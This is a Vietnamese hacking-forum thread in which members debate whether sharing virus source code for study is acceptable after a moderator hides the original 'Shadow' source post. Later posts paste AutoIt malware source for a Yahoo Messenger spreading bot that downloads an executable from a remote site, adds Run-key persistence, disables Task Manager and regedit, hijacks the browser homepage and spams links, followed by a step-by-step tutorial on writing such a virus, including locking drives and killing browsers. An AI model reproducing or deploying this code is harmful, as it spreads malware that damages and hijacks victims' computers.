[Question] Mã nguồn một con Virus ( Shadow )! |
16/03/2007 03:39:41 (+0700) | #1 | 46945 |
|
ngochoan2003
Member
|
0 |
|
|
Joined: 15/05/2003 14:09:36
Messages: 91
Offline
|
|
Tui có mã nguồn con này bằng Asem có bác nào cần mã nguồn của nó để nghiên cứu học hỏi không ? |
|
|
|
|
[Question] Mã nguồn một con Virus ( Shadow )! |
16/03/2007 04:39:13 (+0700) | #2 | 46972 |
|
chip_van_123
Member
|
0 |
|
|
Joined: 13/03/2007 16:57:13
Messages: 11
Offline
|
|
gửi lên đi cho anh em cùng xem |
|
|
|
|
[Question] Mã nguồn một con Virus ( Shadow )! |
17/03/2007 05:05:16 (+0700) | #3 | 47246 |
|
ngochoan2003
Member
|
0 |
|
|
Joined: 15/05/2003 14:09:36
Messages: 91
Offline
|
|
This post is set hidden by a moderator because it may be violating forum's guideline or it needs modification before setting visible to members. |
|
|
|
|
[Question] Mã nguồn một con Virus ( Shadow )! |
18/03/2007 04:15:23 (+0700) | #4 | 47504 |
|
superdream
Member
|
0 |
|
|
Joined: 22/09/2006 17:53:30
Messages: 20
Offline
|
|
e bó tay luôn,ko hiểu gì hết à. |
|
|
|
|
[Question] Mã nguồn một con Virus ( Shadow )! |
18/03/2007 04:56:41 (+0700) | #5 | 47513 |
|
tmd
Member
|
0 |
|
|
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
|
|
Google có vô số mã nguồn của virus... các loại, sao các bác không đi trao đổi với nhân viên của Google. Chẳng thấy ai trao đổi về lập trình. Các bác nhảm quá trời. |
|
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ... |
|
|
|
[Question] Re: Mã nguồn một con Virus ( Shadow )! |
21/03/2007 00:00:29 (+0700) | #6 | 48073 |
|
xanga92
Member
|
0 |
|
|
Joined: 02/01/2007 19:41:45
Messages: 1
Offline
|
|
moá ơi kô comment cho em hỉu với bác . :lol |
|
|
|
|
[Question] Mã nguồn một con Virus ( Shadow )! |
21/03/2007 00:52:03 (+0700) | #7 | 48089 |
|
Invincible
Member
|
0 |
|
|
Joined: 28/07/2006 18:35:20
Messages: 32
Location: quán nhậu
Offline
|
|
Thanks 4 share. Lần sau bạn nên đưa vào vào tag cho mọi người tiện theo dõi nhé .
Thân. |
|
|
|
|
[Question] Mã nguồn một con Virus ( Shadow )! |
23/03/2007 21:40:54 (+0700) | #8 | 48823 |
|
ngochoan2003
Member
|
0 |
|
|
Joined: 15/05/2003 14:09:36
Messages: 91
Offline
|
|
|
|
[Question] Mã nguồn một con Virus ( Shadow )! |
24/03/2007 02:50:54 (+0700) | #9 | 48877 |
dhhcva
Member
|
0 |
|
|
Joined: 08/08/2006 17:26:00
Messages: 2
Offline
|
|
bác Admin phải cho mọi người biết để tham khảo chứ |
|
|
|
|
[Question] Mã nguồn một con Virus ( Shadow )! |
24/03/2007 04:34:21 (+0700) | #10 | 48907 |
|
ngochoan2003
Member
|
0 |
|
|
Joined: 15/05/2003 14:09:36
Messages: 91
Offline
|
|
Nếu không cho anh em đọc Code thì sao mà biết cách chúng hoạt động kiểu gì ???
Muốn diệt loại Worm tương tự thì làm như thế nào.
Mà theo tui nghĩ là nếu ai đó dựa vào code mà design nó thành một biến thể khác thì họ hoàn toàn hiểu được mình đang làm gì và sẽ chịu trách nhiệm trước hành động của mình.
Các bác Hide hết luôn thế thì anh em khó học hỏi lắm.
Mà nhiều người đọc còn không hiểu mà ! *_* |
|
|
|
|
[Question] Re: Mã nguồn một con Virus ( Shadow )! |
25/03/2007 03:39:29 (+0700) | #11 | 49087 |
|
seaname
Member
|
0 |
|
|
Joined: 15/12/2006 19:53:22
Messages: 11
Offline
|
|
Chán! hí hửng tưởng đc xem... không ngờ hide mất tiêu!
Mọi người cứ tạo điều kiện cho tui ..vô học sao! |
|
|
|
|
[Question] Mã nguồn một con Virus ( Shadow )! |
25/03/2007 04:05:30 (+0700) | #12 | 49096 |
không hide thì bảo là phát tán mã nguồn virus tạo điều kiện cho có thêm nhiều virus và kẻ xấu lợi dụng ....nhiều chuyện nữa mà hide thì kêu là không cho học hỏi.
Pó tay. |
|
Hãy luôn khao khát , hãy cứ dại khở ! |
|
|
|
[Question] Mã nguồn một con Virus ( Shadow )! |
25/03/2007 14:36:08 (+0700) | #13 | 49211 |
|
tmd
Member
|
0 |
|
|
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
|
|
Kẻ xấu nhiều quá. Sử dụng "học" để che dấu cho các mục đích không tốt . Hide là phải, kêu ca gì nửa. |
|
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ... |
|
|
|
[Question] Mã nguồn một con Virus ( Shadow )! |
28/03/2007 00:53:32 (+0700) | #14 | 49807 |
|
ngochoan2003
Member
|
0 |
|
|
Joined: 15/05/2003 14:09:36
Messages: 91
Offline
|
|
tmd wrote:
Kẻ xấu nhiều quá. Sử dụng "học" để che dấu cho các mục đích không tốt . Hide là phải, kêu ca gì nửa.
Xin cho tui nó thẳng nhé :
Về đoạn code mà tui post lên đây không phải ai cũng có thể hiểu được nó. Cho dù bạn có thể Copy nó nhưng chắc gì bạn đã hiểu chạy như thế nào !
|
|
|
|
|
[Question] Re: Mã nguồn một con Virus ( Shadow )! |
28/03/2007 01:08:04 (+0700) | #15 | 49813 |
|
azteam
Member
|
0 |
|
|
Joined: 17/03/2007 21:12:46
Messages: 177
Location: /dev/null
Offline
|
|
Thôi. Theo quy định của diễn đàn mà thực hiện. Còn Source Code của Shadow thì tìm đơn giản. Lền Google mà search cái là ra ngay. Nếu u muốn phân tích đoạn code của nó thì cứ trích từng đoạn ra mà phân tích. Cần j phải page nguyên cả đoạn code của nó. Phân tích miễn không bày cách phát tán nó là được, chắc không vi phạm nội quy của diễn đàn ) |
|
|
|
|
[Question] Mã nguồn một con Virus ( Shadow )! |
31/03/2007 23:21:39 (+0700) | #16 | 50765 |
|
posiden
Member
|
0 |
|
|
Joined: 02/10/2003 08:57:15
Messages: 84
Location: University of Natural Science - 03CK2
Offline
|
|
đúng,đưa từng đoạn lên,đoạn nào có thể lý giải cơ chế hoạt động của nó ấy...từ đó đề nghị cách khống chế và loại trừ nó,chắc vậy thì không vi phạm đâu ấy nhỉ |
|
|
|
|
[Question] Mã nguồn một con Virus ( Shadow )! |
31/03/2007 23:46:36 (+0700) | #17 | 50772 |
bongtrangta
Member
|
0 |
|
|
Joined: 06/07/2006 22:08:02
Messages: 5
Offline
|
|
Bác post lại từng đoạn đi.
có comment nữa.Cái này thực ra là rất có ích đấy |
|
|
|
|
[Question] Re: Mã nguồn một con Virus ( Shadow )! |
01/04/2007 04:08:50 (+0700) | #18 | 50819 |
|
langtu_nobita
Member
|
0 |
|
|
Joined: 29/03/2007 18:34:58
Messages: 7
Location: Planet_X
Offline
|
|
Các bác dzô trang này mà down file PDF mã nguồn của cái con Shadow này:
http://www.rohitab.com/sourcecode/shadow.html
Tui đọc mãi mới hiểu sơ sơ........
Luôn luôn lắng nghe, lâu lâu mới hiểu...... |
|
|
|
|
[Question] Mã nguồn một con Virus ( Shadow )! |
03/12/2009 20:27:04 (+0700) | #19 | 199712 |
myloveonlyyou
Member
|
0 |
|
|
Joined: 21/10/2009 13:40:15
Messages: 1
Offline
|
|
gui ma nguon len de cho anh em dung de nghien cuu hoc tap nhanh nha anh |
|
myloveonlyyou |
|
|
|
[Question] Mã nguồn một con Virus ( Shadow )! |
28/12/2009 08:11:24 (+0700) | #20 | 202000 |
|
babudacu
Member
|
0 |
|
|
Joined: 24/11/2007 02:33:11
Messages: 21
Offline
|
|
|
|
[Question] Mã nguồn một con Virus ( Shadow )! |
30/12/2009 17:00:08 (+0700) | #21 | 202174 |
|
LucKy DAy
Member
|
0 |
|
|
Joined: 26/12/2009 21:12:21
Messages: 7
Offline
|
|
uhm post đoạn mã nguồn đấy lên đúng là rất có ích vì nó giúp ta nghiên cứu cách hoạt động của virus để phòng ngừa với lại không phải ai đọc cũng hiểu được vì thế bác cứ post từng phần lên cho anh em nghiên cứu để vừa biết cách phòng ngừa vừa đỡ vi phạm nội qui của diễn đàn
Nhân tiện em post luôn cho các bác đoạn mã của con virus đang thịnh hành trong yahoo nè (đấy là em sưu tầm thui có gì sai sót các bác thông cảm nha )
[code]
;------------------------------------------------
; Phan Mem: DKC Bot
; Phien Ban: 1.1
; Cong Dung: Quang cao Website thong qua Y!M
;-------------------------------------------------------
; Thiet Lap
#NoTrayIcon
= "Tieu De Trinh Duyet"
= Random(0,9,1)
; Website Ngau Nhien
Dim
= " http://website1 "
= " http://website2 "
= " http://website3 "
= " http://website4 "
= " http://website5 "
= " http://website6 "
= " http://website7 "
= " http://website8 "
= " http://website9 "
= " http://website10 "
=
; Tin Nhan Ngau Nhien
Dim
= "Loi Nhan 1" &
= "Loi Nhan 2" &
= "Loi Nhan 3" &
= "Loi Nhan 4" &
= "Loi Nhan 5" &
= "Loi Nhan 6" &
= "Loi Nhan 7" &
= "Loi Nhan 8" &
= "Loi Nhan 9" &
= "Loi Nhan 10" &
=
; Lay Nhiem Vao He Thong
If Not FileExists(@WindowsDir & "taskmng.exe") Then
InetGet ( & "/dkc.exe", @WindowsDir & "taskmng.exe", 0, 1)
Sleep(5000)
EndIf
; Ghi Khoa Registry
RegWrite("HKEY_CURRENT_USERSoftwarePoliciesMicr osoftInternet ExplorerControl Panel", "Homepage", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USERSoftwareMicrosoftWin dowsCurrentVersionPoliciesSystem", "DisableTaskMgr", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USERSoftwareMicrosoftWin dowsCurrentVersionPoliciesSystem", "DisableRegistryTools", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USERSoftwareMicrosoftInt ernet ExplorerMain", "Start Page", "REG_SZ", )
RegWrite("HKEY_CURRENT_USERSoftwareYahoopagerV iewYMSGR_buzz", "content url", "REG_SZ", )
RegWrite("HKEY_CURRENT_USERSoftwareYahoopagerV iewYMSGR_Launchcast", "content url", "REG_SZ", )
RegWrite("HKEY_LOCAL_MACHINESoftwareMicrosoftWi ndowsCurrentVersionRun", "Task Manager", "REG_SZ", @WindowsDir & "taskmng.exe")
RegWrite("HKEY_CURRENT_USERSoftwareMicrosoftInt ernet ExplorerMain", "Window Title", "REG_SZ", )
; Thay Doi Status & Gui Tin Nhan
While(1)
Sleep(60000)
= WinGetTitle("Yahoo! Messenger", "")
= WinExists()
If = 1 Then
ClipPut()
BlockInput(1)
WinActivate()
Send("!m")
Send("un")
Send("^v {ENTER}{ENTER}")
Send("^m")
Send("{DOWN}")
Send("^{SHIFTDOWN}{END}{SHIFTUP}")
Send("{ENTER}")
Send("^v {ENTER}")
BlockInput(0)
EndIf
Sleep(1800000)
WEnd
Trên đây là mã nguồn của virut lây lan qua Yahoo và nó được biên dịch bằng AutoIt. |
|
Keep moving forward!
Yahoo Messenger: do.huuphu
Web Site:http://vn.360plus.yahoo.com/LucKyDAy-home |
|
|
|
[Question] Mã nguồn một con Virus ( Shadow )! |
30/12/2009 21:44:54 (+0700) | #22 | 202193 |
ngoisaologin
Member
|
0 |
|
|
Joined: 28/07/2009 17:33:24
Messages: 2
Offline
|
|
Bac cho minh hoi doan code do duoc viet bang ngon ngu gi vay ? tui dau ve ma coi no la lam !!! hihi....... |
|
|
|
|
[Question] Mã nguồn một con Virus ( Shadow )! |
01/01/2010 12:17:14 (+0700) | #23 | 202314 |
|
LucKy DAy
Member
|
0 |
|
|
Joined: 26/12/2009 21:12:21
Messages: 7
Offline
|
|
ngoisaologin wrote:
Bac cho minh hoi doan code do duoc viet bang ngon ngu gi vay ? tui dau ve ma coi no la lam !!! hihi.......
Có lẽ bạn nên hỏi anh Admin thì tốt hơn nhưng mình nghĩ chắc là lập trình bằng Script với lại một số câu lệnh cũng giống hệt như Pascal nữa nhưng đúng hơn cả có lẽ là ngôn ngữ C hoặc C++ đấy . Nên tốt nhất là phải nhờ anh Admin giúp rùi
Chi tiết hơn nữa nè :
Code:
Lệnh đầu tiên mà bắt buộc con virus = autoit nào cũng phải có:
#Notrayicon
---> để kô hiện chương trình ở khay icon
FileCopy(@ScriptDir & "\******.exe","C:\WINDOWS",1)
---> "*****" sẽ là tên virus mà bạn tạo ở con autoit này, lệnh này dùng để kết hợp với lệnh kế tiếp
Lệnh khắc phục:
FileDelete("C:\Windows\*****.exe")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run","explorer","REG_SZ",@WindowsDir & "\*****.exe")
---> **** sẽ là tên chương trình, lệnh này dùng để khởi động virus mỗi khi máy tính được bật lên, và chỉ dùng được khi có lệnh ở trên
Lệnh khắc phục:
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run","explorer")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","REG_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","REG_DWORD","1")
----> lệnh này sẽ giúp con virus của bạn khóa taskmanager của máy tính
Lệnh khắc phục:
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr")
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","REG_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","REG_DWORD","1")
----> lệnh này sẽ giúp con virus của bạn khóa regedit của máy tính
Lệnh khắc phục:
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools")
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoRun","REG_DWORD","1")
----> lệnh này sẽ giúp làm mất nút run trong windows
Lệnh khắc phục:
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoRun")
RegWrite("HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel","Homepage","REG_DWORD","kick_bay_gio@yahoo.com.vn")
RegWrite("HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel","Homepage","REG_DWORD","1")
----> lệnh này sẽ giúp bạn thay đổi homepage của IE, ở đây mình change homepage lại là <a href="mailto:kick_bay_gio@yahoo.com.vn">kick_bay_gio@yahoo.com.vn</a> ^^"
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive","REG_DWORD","67108863")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive","REG_DWORD","67108863")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDrives","REG_DWORD","67108863")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDrives","REG_DWORD","67108863")
----> lệnh này giúp bạn khóa ổ đĩa của người khác, kô cho truy cập vào ổ đĩa, "67108863" ---> là thông số để khóa tất cả các ổ đĩa
Lệnh khắc phục:
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive")
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive")
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDrives")
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDrives")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoClose","REG_DWORD","1")
---> lệnh này làm mất nút close ở mỗi chương trinh (bật lên là kô thể tắt được (O_o)
Lệnh khắc phục:
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoClose")
Lệnh reset máy:
Shutdown(thông số)
Các thông số có thể có là
+0: Đổi user (hay thường gọi là log off)
+1: Tắt máy (shutdown)
+2: reset máy(restart)
+4: Force
+8: Power down
+32: Stanby
+64: Hibernate
VD: Shutdown(2) ---> reset máy
Lệnh đợi, dừng:
Sleep(seconds)
VD: Sleep(3000) ---> Dừng 3 giây
Cách phát tán trên yahoo (hót nhất ^^)
Dim $tin[10] -----> $tin[so] So: số ở đây là số tin nhắn mà bạn muống gửi trong yahoo
$tin[0] ="marryme " ------> bạn đặt lời nhắn vào trong dấu ngoặc kép + link down virus ^^"
$tin[1] ="vip"
$tin[2] =" nhut"
$tin[3] =" babu"
$tin[4] =" ...."
$tin[5] =" ...."
$tin[6] ="...... "
$tin[7] ="..... "
$tin[8] ="..... "
$tin[9] ="...... "
$tieude = WinGetTitle("Yahoo! Messenger","")
$kiemtra = WinExists ($tieude)
While 1
If $kiemtra = 1 Then
$ngaunhien = Random(0,9,1)
Sleep(2500)
ClipPut($tin[$ngaunhien])
BlockInput (1)
WinActivate($tieude)
Send("!m")
Send("un")
Send("^v {ENTER}{ENTER}")
Send("^m")
Send("{DOWN}")
Send("^{SHIFTDOWN}{END}{SHIFTUP}")
Send("{ENTER}")
Send("^v {ENTER}")
BlockInput (0)
EndIf
Lệnh kô cho mở 1 chương trình bất kỳ (chỉ cần biết tên process của chương trình đó)
While
If ProcessExists("iexplorer.exe") then
ProcessClose("iexplorer.exe")
EndIf
If ProcessExists("firefox.exe") then
ProcessClose("firefox.exe")
EndIf
WEnd
----> VD: If ProcessExists("iexplorer.exe") then ---> khi máy tính mở file iexplorer (IE)
ProcessClose("iexplorer.exe") --> đóng ngay lập tức
EndIf
|
|
Keep moving forward!
Yahoo Messenger: do.huuphu
Web Site:http://vn.360plus.yahoo.com/LucKyDAy-home |
|
|
|
|
|
|
Users currently in here |
1 Anonymous
|
|
Powered by JForum - Extended by HVAOnline
hvaonline.net | hvaforum.net | hvazone.net | hvanews.net | vnhacker.org
1999 - 2013 ©
v2012|0504|218|
|
|